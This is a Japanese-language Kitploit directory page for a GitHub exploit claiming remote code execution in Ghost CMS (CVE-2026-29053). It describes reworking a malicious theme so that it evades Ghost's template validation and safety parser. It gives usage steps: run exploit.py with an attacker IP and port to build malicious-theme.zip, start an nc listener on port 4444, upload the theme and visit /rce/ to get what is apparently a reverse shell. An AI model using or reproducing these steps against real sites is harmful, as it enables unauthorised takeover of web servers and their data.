Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-29053 — Ghost CMSで発見された(RCE)脆弱性(具体的にはバージョン0.7.2から6.19.0に影響) | Kitploit
ツール/GitHubGitHub/ac8999/cve-2026-29053
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubac8999/cve-2026-29053

CVE-2026-29053

Ghost CMSで発見された(RCE)脆弱性(具体的にはバージョン0.7.2から6.19.0に影響)

リポジトリを見る
114ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

これは、同じCVEに対するrootxran氏のリポジトリのリワーク版です - https://github.com/rootxran/CVE-2026-29053

特定のGhost CMS環境でのテスト中に、元のテーマペイロードが致命的なHandlebarsエラーを引き起こしました。CMSは、author.hbsファイル内で非推奨または欠落したヘルパー(social_url)を参照していたため、悪意のあるテーマのアクティベーションに失敗しました。

Handlebarsテンプレートをネイティブで互換性のあるヘルパーを使用するように更新しました。これにより、テーマがGhostの内部検証チェックを通過し、テーマエンジンのセーフティパーサーによってブロックされることなく、エクスプロイトが正常にアクティベーションされます。

使用方法:(動画ガイドについては元のエクスプロイトを参照してください)。

root@kitploit:~
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip

1. nc -lvnp 4444
2. テーマをアップロードし、スラッグ「rce」でページを作成する
3. /rce/ にアクセスする
ツールをダウンロード